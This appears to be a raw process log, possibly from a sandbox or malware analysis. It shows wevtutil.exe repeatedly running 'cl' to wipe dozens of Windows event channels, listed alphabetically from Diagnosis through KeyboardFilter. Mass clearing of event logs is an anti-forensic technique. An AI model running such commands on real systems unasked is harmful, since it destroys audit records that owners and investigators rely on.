C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-MSDE/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PLA/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PLA/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Perfhost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scheduled/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-WDC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-WDI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Networking/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Networking/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D10/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D10_1/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/PerfTiming

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D12/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D12/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D12/PerfTiming

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D9/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3DShaderCache/Default

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectComposition/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectManipulation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectShow-KernelSupport/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectSound/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Disk/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnostic/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticDataCollector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticResolver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dism-Api/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dism-Api/ExternalAnalytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dism-Api/InternalAnalytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dism-Cli/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplayColorCalibration/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplayColorCalibration/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplaySwitch/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Documents/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dot3MM/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DriverFrameworks-UserMode/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DucUpdateAgent/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dwm-API/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dwm-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dwm-Dwm/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dwm-Redir/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dwm-Udwm/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl-Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl-Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Contention

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Power

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxpTaskSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EDP-Application-Learning/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EDP-Audit-Regular/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EDP-Audit-TCB/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EFS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ESE/IODiagnose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ESE/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-RasChap/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-RasTls/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-Sim/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-Ttls/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EaseOfAccess/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Energy-Estimation-Engine/EventLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Energy-Estimation-Engine/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventCollector/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventCollector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog-WMIProvider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FailoverClustering-Client/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Fault-Tolerant-Heap/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FeatureConfiguration/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FeatureConfiguration/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Catalog/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Catalog/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-ConfigManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-ConfigManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Core/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Core/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Core/WHC

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Engine/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Engine/BackupLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Engine/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-EventListener/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-EventListener/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Service/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Service/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-UI-Events/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-UI-Events/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileInfoMinifilter/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Firewall-CPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Forwarding/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Forwarding/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GPIO-ClassExtension/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GenericRoaming/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GroupPolicy/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HAL/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenter/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenter/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenterCPL/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HelloForBusiness/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Help/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HomeGroup-ListenerService

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HotspotAuth/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HotspotAuth/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HttpService/Log

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HttpService/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Guest-Drivers/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Guest-Drivers/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Guest-Drivers/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Hypervisor-Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Hypervisor-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Hypervisor-Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-NETVSC/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-VID-Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-VID-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IE-SmartScreen

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IKE/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IKEDBG/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-Broker/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-CandidateUI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-CustomerFeedbackManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-JPAPI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-JPLMP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-JPPRED/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-JPSetting/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-JPTIP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-KRAPI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-KRTIP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-OEDCompiler/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-TCCORE/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-TCTIP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IME-TIP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPNAT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPSEC-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPxlatCfg/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPxlatCfg/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IdCtrls/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IdCtrls/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Input-HIDCLASS-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-InputSwitch/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-International-RegionalOptionsControlPanel/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KdsSvc/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kerberos/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Acpi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-AppCompat/General

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-AppCompat/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ApphelpCache/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ApphelpCache/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ApphelpCache/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Boot/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Boot/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Disk/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-EventTracing/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-EventTracing/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-File/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-IO/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-IoTrace/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-LiveDump/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-LiveDump/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Memory/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Network/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Pdc/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Pep/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-PnP/Configuration

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Thermal-Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Thermal-Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Prefetch/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Process/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Processor-Power/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Registry/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Registry/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ShimEngine/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ShimEngine/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ShimEngine/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-StoreMgr/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-StoreMgr/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Errors

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-XDV/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KeyboardFilter/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KeyboardFilter/Operational

